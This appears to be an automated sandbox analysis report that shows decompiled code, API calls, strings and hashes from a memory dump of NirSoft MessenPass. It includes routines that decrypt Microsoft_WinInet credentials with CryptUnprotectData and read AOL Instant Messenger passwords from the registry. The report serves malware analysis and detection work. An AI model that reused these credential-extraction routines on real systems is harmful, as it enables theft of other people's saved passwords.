Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88

Uniqueness

Uniqueness Score: -1.00%

Function 00404578, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404578(wchar_t** __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _v36;
				int _v40;
				void* _v44;
				int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				wchar_t* _v64;
				int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				long _v148;
				short _v666;
				void _v1176;
				char _v2200;
				char _v2712;
				void _v3222;
				char _v3224;
				void* __esi;
				int _t118;
				signed int _t122;
				signed int _t123;
				wchar_t* _t127;
				int _t129;
				int _t137;
				void* _t146;
				int _t156;
				wchar_t* _t160;
				wchar_t* _t161;
				void* _t165;
				int _t175;
				wchar_t* _t178;
				wchar_t** _t182;
				signed int _t183;
				void* _t203;
				signed int _t205;
				signed int _t207;
				wchar_t* _t210;
				wchar_t* _t214;
				void* _t215;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				void* _t243;

				_t182 = __ebx;
				_t183 = 9;
				memcpy( &_v148, 0x417fb8, _t183 << 2);
				_t217 = _t216 + 0xc;
				_t118 = wcslen( &_v148);
				_t205 = 0;
				_v68 = _t118;
				 *_t217 = 0xbfe;
				_v3224 = 0;
				memset( &_v3222, 0, ??);
				_t218 = _t217 + 0xc;
				if(E00406B3B() == 0) {
					_push(3);
					_v20 = 4;
				} else {
					_push(4);
					_v20 = 5;
				}
				_pop(_t122);
				_t123 = _t122 << 9;
				_v28 = _t123;
				_t182[1] = _t215 + _t123 - 0xc94;
				 *_t182 =  &_v3224;
				_t182[3] =  &_v2712;
				_t127 = _t215 + (_v20 << 9) - 0xc94;
				_t182[4] =  &_v2200;
				_v64 = _t127;
				_t182[2] = _t127;
				_t203 = 0;
				_v12 = _t205;
				goto L5;
				L6:
				_v24 = _t205;
				_v32 = _t205;
				if(_v12 != _v20) {
					L20:
					if(_v12 != 4) {
						L30:
						if(_v32 == 0) {
							_t137 = _v16;
							if(_t137 > 0x1fa) {
								_t137 = 0x1fa;
							}
							_t99 = _a8 + 4; // 0x8
							_t207 = _v12 << 9;
							memcpy(_t215 + _t207 - 0xc94, _t203 + _t99, _t137);
							 *(_t215 + _t207 - 0xa96) =  *(_t215 + _t207 - 0xa96) & 0x00000000;
							_t218 = _t218 + 0xc;
							if(_v12 == 0) {
								E00406B3B();
							}
						}
						goto L35;
					}
					_t232 = _t182[5] - 4;
					if(_t182[5] != 4) {
						goto L30;
					}
					_v60 = 0;
					_v52 = 0;
					_v56 = 0;
					if(E00404C9D( &_v60, _t232) == 0) {
						L29:
						E00404CE0( &_v60);
						if(_v24 != 0) {
							goto L35;
						}
						goto L30;
					}
					_t146 = 0;
					do {
						_t72 = _t146 + 0x41da78; // 0x320038
						 *(_t146 + 0x41eb80) =  *_t72 << 2;
						_t146 = _t146 + 2;
					} while (_t146 < 0x4a);
					_t76 = _a8 + 4; // 0x8
					_v100 = _t203 + _t76;
					_v104 = _v16;
					_v88 = 0x4a;
					_v84 = 0x41eb80;
					if(E00404CF5( &_v60,  &_v104,  &_v88,  &_v48) != 0) {
						_t156 = _v48;
						if(_t156 > 0x1fa) {
							_t156 = 0x1fa;
						}
						memcpy( &_v1176, _v44, _t156);
						_t218 = _t218 + 0xc;
						_v666 = 0;
						LocalFree(_v44);
						_v24 = 1;
					}
					goto L29;
				} else {
					_t210 =  *_t182;
					_t160 = wcschr(_t210, 0x3d);
					if(_t160 != 0) {
						_t31 =  &(_t160[0]); // 0x2
						_t210 = _t31;
					}
					_t161 =  &_v148;
					0x413d86(_t210, _t161, _v68);
					_t218 = _t218 + 0xc;
					_t223 = _t161;
					if(_t161 != 0) {
						goto L20;
					}
					_v80 = 0;
					_v72 = 0;
					_v76 = 0;
					if(E00404C9D( &_v80, _t223) == 0) {
						L19:
						E00404CE0( &_v80);
						goto L20;
					}
					_t165 = 0;
					do {
						_t38 = _t165 + 0x41dac8; // 0x620061
						 *(_t165 + 0x41e980) =  *_t38 << 2;
						_t165 = _t165 + 2;
					} while (_t165 < 0x4a);
					_t42 = _a8 + 4; // 0x8
					_v108 = _t203 + _t42;
					_v112 = _v16;
					_v96 = 0x4a;
					_v92 = 0x41e980;
					if(E00404CF5( &_v80,  &_v112,  &_v96,  &_v40) != 0) {
						_t175 = _v40;
						if(_t175 > 0x1fa) {
							_t175 = 0x1fa;
						}
						_t214 = _t215 + _v28 - 0xc94;
						memcpy(_t214, _v36, _t175);
						 *(_t215 + _v28 - 0xa96) =  *(_t215 + _v28 - 0xa96) & 0x00000000;
						_t178 = wcschr(_t214, 0x3a);
						_t218 = _t218 + 0x14;
						if(_t178 != 0) {
							 *_t178 =  *_t178 & 0x00000000;
							wcscpy(_v64,  &(_t178[0]));
						}
						_v32 = 1;
						LocalFree(_v36);
					}
					goto L19;
				}
				L35:
				_v12 = _v12 + 1;
				_t203 = _t203 + _v16 + 4;
				if(E00406B3B() == 0) {
					__eflags = _v12 - 5;
				} else {
					_t243 = _v12 - 6;
				}
				if(_t243 >= 0 || _t203 > _a12) {
					 *((intOrPtr*)( *_a4))(_t182);
					return 1;
				} else {
					_t205 = 0;
					__eflags = 0;
					L5:
					_t129 =  *(_t203 + _a8);
					_v16 = _t129;
					if(_t129 <= _t205) {
						goto L35;
					}
					goto L6;
				}
			}

0x00404578
0x00404585
0x00404598
0x00404598
0x0040459a
0x0040459f
0x004045a1
0x004045a4
0x004045b3
0x004045ba
0x004045bf
0x004045c9
0x004045d6
0x004045d8
0x004045cb
0x004045cb
0x004045cd
0x004045cd
0x004045df
0x004045e0
0x004045e3
0x004045f3
0x004045f9
0x00404604
0x00404607
0x00404614
0x00404617
0x0040461a
0x0040461d
0x0040461f
0x00404622
0x00404637
0x0040463d
0x00404640
0x00404643
0x0040474a
0x0040474e
0x00404810
0x00404814
0x00404816
0x00404820
0x00404822
0x00404822
0x0040482b
0x00404830
0x0040483b
0x00404840
0x00404849
0x00404850
0x00404852
0x00404852
0x00404850
0x00000000
0x00404814
0x00404754
0x00404758
0x00000000
0x00000000
0x00404763
0x00404766
0x00404769
0x00404773
0x00404802
0x00404805
0x0040480e
0x00000000
0x00000000
0x00000000
0x0040480e
0x00404779
0x0040477b
0x0040477b
0x00404786
0x0040478e
0x0040478f
0x00404797
0x0040479b
0x004047a1
0x004047b3
0x004047ba
0x004047c8
0x004047ca
0x004047d4
0x004047d6
0x004047d6
0x004047e3
0x004047e8
0x004047ee
0x004047f5
0x004047fb
0x004047fb
0x00000000
0x00404649
0x00404649
0x0040464e
0x00404657
0x00404659
0x00404659
0x00404659
0x0040465f
0x00404667
0x0040466c
0x0040466f
0x00404671
0x00000000
0x00000000
0x0040467c
0x0040467f
0x00404682
0x0040468c
0x00404742
0x00404745
0x00000000
0x00404745
0x00404692
0x00404694
0x00404694
0x0040469f
0x004046a7
0x004046a8
0x004046b0
0x004046b4
0x004046ba
0x004046cc
0x004046d3
0x004046e1
0x004046e3
0x004046ed
0x004046ef
0x004046ef
0x004046f8
0x00404700
0x00404708
0x00404714
0x00404719
0x0040471e
0x00404720
0x0040472b
0x00404731
0x00404735
0x0040473c
0x0040473c
0x00000000
0x004046e1
0x00404857
0x0040485a
0x0040485d
0x00404868
0x00404870
0x0040486a
0x0040486a
0x0040486a
0x00404874
0x00404885
0x0040488d
0x00404624
0x00404624
0x00404624
0x00404626
0x00404629
0x0040462e
0x00404631
0x00000000
0x00000000
0x00000000
0x00404631

APIs

wcslen.MSVCRT ref: 0040459A
memset.MSVCRT ref: 004045BA
wcschr.MSVCRT ref: 0040464E
_wcsncoll.MSVCRT ref: 00404667
memcpy.MSVCRT ref: 00404700
wcschr.MSVCRT ref: 00404714
wcscpy.MSVCRT ref: 0040472B
memcpy.MSVCRT ref: 004047E3
LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C

Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

memcpy.MSVCRT ref: 0040483B

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

Strings

Microsoft_WinInet, xrefs: 0040458C
?L@, xrefs: 00404578

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
String ID: ?L@$Microsoft_WinInet
API String ID: 1802959924-2674056311
Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004137CE, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004137F3

Part of subcall function 00413646: strlen.MSVCRT ref: 00413653

strlen.MSVCRT ref: 0041380F
memset.MSVCRT ref: 00413849
memset.MSVCRT ref: 0041385D
memset.MSVCRT ref: 00413871
memset.MSVCRT ref: 00413897

Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D

memcpy.MSVCRT ref: 004138CE

Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E

memcpy.MSVCRT ref: 0041390A
memcpy.MSVCRT ref: 0041391C
_mbscpy.MSVCRT ref: 004139F3
memcpy.MSVCRT ref: 00413A24
memcpy.MSVCRT ref: 00413A36

Strings

salu, xrefs: 0041382A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset$strlen$_mbscpy
String ID: salu
API String ID: 3691931180-4177317985
Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95

Uniqueness

Uniqueness Score: -1.00%

Function 00403EDF, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00403EDF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a117889) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t41;
				void* _t42;
				void* _t53;
				void* _t59;
				signed int _t63;
				intOrPtr* _t69;
				void* _t79;
				void* _t82;
				void* _t83;
				intOrPtr _t88;
				intOrPtr _t89;

				 *__eax =  *__eax + __eax;
				_a117889 = _a117889 + 0xc8;
				 *0x0008F951 =  *((intOrPtr*)(0x8f951)) + 0xc8;
				asm("adc [edx+0x55c30000], dh");
				0x414060(_t79);
				_t69 = 0xc8;
				_v8 = 0xc8;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t83 = _t82 + 0x2c;
				_t88 =  *0x41e350; // 0x0
				if(_t88 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t83 = _t83 + 0xc;
				}
				_t89 =  *0x41e34c; // 0x0
				if(_t89 != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t41 =  *((intOrPtr*)( *_t69 + 0x1c))();
				_t63 = 0x10;
				_push(_t41);
				_t42 = memcpy( &_v76, 0x419278, _t63 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t42,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t59 = 6;
				_push(E0040876F(_t59));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t53 = E004067EC(_a4,  &_v2124);
				_t90 = _a8 - 4;
				if(_a8 == 4) {
					_t53 = E0040A5A6(_v8, _t90, _a4);
				}
				return _t53;
			}

0x00403ee1
0x00403ee3
0x00403ee9
0x00403ef1
0x00403efe
0x00403f0e
0x00403f10
0x00403f13
0x00403f28
0x00403f2e
0x00403f3c
0x00403f42
0x00403f50
0x00403f56
0x00403f5b
0x00403f5e
0x00403f64
0x00403f66
0x00403f77
0x00403f7c
0x00403f7c
0x00403f7f
0x00403f85
0x00403f93
0x00403f99
0x00403f9e
0x00403fa3
0x00403fa4
0x00403fad
0x00403fc9
0x00403fca
0x00403fd9
0x00403fe1
0x00403fe8
0x00403fee
0x00403ffb
0x0040400a
0x00404012
0x00404016
0x0040401e
0x0040401e
0x00404027

APIs

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

memset.MSVCRT ref: 00403F2E
memset.MSVCRT ref: 00403F42
memset.MSVCRT ref: 00403F56
sprintf.MSVCRT ref: 00403F77
_mbscpy.MSVCRT ref: 00403F93
sprintf.MSVCRT ref: 00403FCA
sprintf.MSVCRT ref: 00403FFB

Strings

<table dir="rtl"><tr><td>, xrefs: 00403F8D
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
MessenPass, xrefs: 00403FE1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetsprintf$FileWrite_mbscpystrlen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
API String ID: 113626815-2158351146
Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403EF6, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403EF6(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t35;
				void* _t36;
				void* _t47;
				void* _t53;
				signed int _t57;
				intOrPtr* _t63;
				void* _t73;
				void* _t74;
				intOrPtr _t78;
				intOrPtr _t79;

				0x414060();
				_t63 = __ecx;
				_v8 = __ecx;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t74 = _t73 + 0x2c;
				_t78 =  *0x41e350; // 0x0
				if(_t78 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t74 = _t74 + 0xc;
				}
				_t79 =  *0x41e34c; // 0x0
				if(_t79 != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t35 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t57 = 0x10;
				_push(_t35);
				_t36 = memcpy( &_v76, 0x419278, _t57 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t36,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t53 = 6;
				_push(E0040876F(_t53));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t47 = E004067EC(_a4,  &_v2124);
				_t80 = _a8 - 4;
				if(_a8 == 4) {
					_t47 = E0040A5A6(_v8, _t80, _a4);
				}
				return _t47;
			}

0x00403efe
0x00403f0e
0x00403f10
0x00403f13
0x00403f28
0x00403f2e
0x00403f3c
0x00403f42
0x00403f50
0x00403f56
0x00403f5b
0x00403f5e
0x00403f64
0x00403f66
0x00403f77
0x00403f7c
0x00403f7c
0x00403f7f
0x00403f85
0x00403f93
0x00403f99
0x00403f9e
0x00403fa3
0x00403fa4
0x00403fad
0x00403fc9
0x00403fca
0x00403fd9
0x00403fe1
0x00403fe8
0x00403fee
0x00403ffb
0x0040400a
0x00404012
0x00404016
0x0040401e
0x0040401e
0x00404027

APIs

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

memset.MSVCRT ref: 00403F2E
memset.MSVCRT ref: 00403F42
memset.MSVCRT ref: 00403F56
sprintf.MSVCRT ref: 00403F77
_mbscpy.MSVCRT ref: 00403F93
sprintf.MSVCRT ref: 00403FCA
sprintf.MSVCRT ref: 00403FFB

Strings

<table dir="rtl"><tr><td>, xrefs: 00403F8D
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
MessenPass, xrefs: 00403FE1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetsprintf$FileWrite_mbscpystrlen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
API String ID: 113626815-2158351146
Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69

Uniqueness

Uniqueness Score: -1.00%

Function 004062DB, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 168
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004062DB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				char _v24;
				void* _v28;
				void _v1051;
				char _v1052;
				char _v2076;
				char _v3100;
				char _v4124;
				void _v5148;
				void _v6171;
				char _v6172;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t61;
				intOrPtr _t63;
				int _t79;
				int _t81;
				char* _t86;
				void* _t96;
				void* _t102;
				long _t104;
				char _t105;
				void* _t108;

				0x414060();
				_t61 = E004067BA(_a8);
				_t108 = _t61;
				_t96 = _t102;
				_v28 = _t108;
				if(_t108 != 0xffffffff) {
					_t104 = GetFileSize(_t108, 0);
					if(_t104 > 0) {
						_t3 = _t104 + 1; // 0x1
						_t63 = _t3;
						0x413d5c(_t63);
						_v12 = _t63;
						E00406ED6(_t96, 0, _t108, _t63, _t104);
						 *((char*)(_v12 + _t104)) = 0;
						_v24 = 0;
						_v1052 = 0;
						memset( &_v1051, 0, 0x3ff);
						_t105 = 0;
						_v16 = 0;
						_v20 = 0;
						_v8 = 0;
						_v6172 = 0;
						memset( &_v6171, 0, 0x3ff);
						memset( &_v5148, 0, 0x1000);
						if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
							L5:
							while(1) {
								if(_v16 > 0) {
									_t79 = strcmp( &_v1052, 0x4181f4);
									_pop(_t96);
									if(_t79 != 0) {
										__eflags = _v20;
										if(_v20 != 0) {
											__eflags = _t105;
											if(_t105 != 0) {
												__eflags = _t105 - 1;
												if(_t105 != 1) {
													__eflags = _t105 - 2;
													if(_t105 != 2) {
														__eflags = _t105 - 3;
														if(_t105 != 3) {
															__eflags = _t105 - 4;
															if(__eflags != 0) {
																if(__eflags > 0) {
																	__eflags = _v1052;
																	if(_v1052 == 0) {
																		L26:
																		_v8 = 0;
																	} else {
																		_t81 = strcmp( &_v1052, "---");
																		__eflags = _t81;
																		_pop(_t96);
																		if(_t81 == 0) {
																			goto L26;
																		}
																	}
																}
															} else {
																0x413d0c( &_v4124,  &_v1052);
																_pop(_t96);
																E0040623F(_a4,  &_v6172, _a8);
																_v5148 = 0;
																_v4124 = 0;
																_v3100 = 0;
																_v2076 = 0;
															}
														} else {
															_push( &_v1052);
															_t86 =  &_v2076;
															goto L20;
														}
													} else {
														_push( &_v1052);
														_t86 =  &_v5148;
														goto L20;
													}
												} else {
													_push( &_v1052);
													_t86 =  &_v3100;
													goto L20;
												}
											} else {
												_push( &_v1052);
												_t86 =  &_v6172;
												L20:
												0x413d0c();
												_t96 = _t86;
											}
											_t51 =  &_v8;
											 *_t51 = _v8 + 1;
											__eflags =  *_t51;
										}
									} else {
										if(_v20 == 0) {
											_v20 = 1;
										} else {
											_v5148 = 0;
											_v4124 = 0;
											_v3100 = 0;
											_v2076 = 0;
											_v6172 = 0;
										}
										_v8 = 0;
									}
								}
								_v16 = _v16 + 1;
								if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
									_t105 = _v8;
									continue;
								}
								goto L29;
							}
						}
						L29:
						0x413d56(_v12);
					}
					_t61 = CloseHandle(_v28);
				}
				return _t61;
			}

0x004062e3
0x004062ee
0x004062f3
0x004062f8
0x004062f9
0x004062fc
0x0040630c
0x00406310
0x00406316
0x00406316
0x0040631a
0x00406324
0x00406327
0x00406334
0x00406340
0x00406343
0x00406349
0x00406356
0x00406359
0x0040635c
0x0040635f
0x00406362
0x00406368
0x0040637a
0x00406397
0x00000000
0x004063a2
0x004063a7
0x004063b9
0x004063c1
0x004063c2
0x004063f8
0x004063fb
0x00406401
0x00406403
0x00406414
0x00406417
0x00406428
0x0040642b
0x0040643c
0x0040643f
0x00406458
0x0040645b
0x0040649d
0x0040649f
0x004064a5
0x004064be
0x004064be
0x004064a7
0x004064b3
0x004064b8
0x004064bb
0x004064bc
0x00000000
0x00000000
0x004064bc
0x004064a5
0x0040645d
0x0040646b
0x00406474
0x0040647e
0x00406483
0x00406489
0x0040648f
0x00406495
0x00406495
0x00406441
0x00406447
0x00406448
0x00000000
0x00406448
0x0040642d
0x00406433
0x00406434
0x00000000
0x00406434
0x00406419
0x0040641f
0x00406420
0x00000000
0x00406420
0x00406405
0x0040640b
0x0040640c
0x0040644e
0x0040644f
0x00406455
0x00406455
0x004064c1
0x004064c1
0x004064c1
0x004064c1
0x004063c4
0x004063c7
0x004063e9
0x004063c9
0x004063c9
0x004063cf
0x004063d5
0x004063db
0x004063e1
0x004063e1
0x004063f0
0x004063f0
0x004063c2
0x004064c7
0x004064dc
0x0040639f
0x00000000
0x0040639f
0x00000000
0x004064dc
0x004063a2
0x004064e2
0x004064e5
0x004064ea
0x004064ee
0x004064ee
0x004064f8

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
??2@YAPAXI@Z.MSVCRT ref: 0040631A

Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

memset.MSVCRT ref: 00406349
memset.MSVCRT ref: 00406368
memset.MSVCRT ref: 0040637A
strcmp.MSVCRT ref: 004063B9
_mbscpy.MSVCRT ref: 0040644F
_mbscpy.MSVCRT ref: 0040646B
strcmp.MSVCRT ref: 004064B3
??3@YAXPAX@Z.MSVCRT ref: 004064E5
CloseHandle.KERNEL32(?), ref: 004064EE

Strings

---, xrefs: 004064AD

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3240106862-2854292027
Opcode ID: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
Opcode Fuzzy Hash: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E725, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 0040E768
memset.MSVCRT ref: 0040E77C
memset.MSVCRT ref: 0040E790
memset.MSVCRT ref: 0040E7A8

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

sprintf.MSVCRT ref: 0040E7D8
strlen.MSVCRT ref: 0040E806
_mbscpy.MSVCRT ref: 0040E888
_mbscpy.MSVCRT ref: 0040E89B
RegCloseKey.ADVAPI32(?), ref: 0040E8ED

Strings

%s\Login, xrefs: 0040E7D2
Password, xrefs: 0040E7DE
Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
API String ID: 1782299107-1248239246
Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004100A4, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 117registryCOMMON

Download Yara Rule

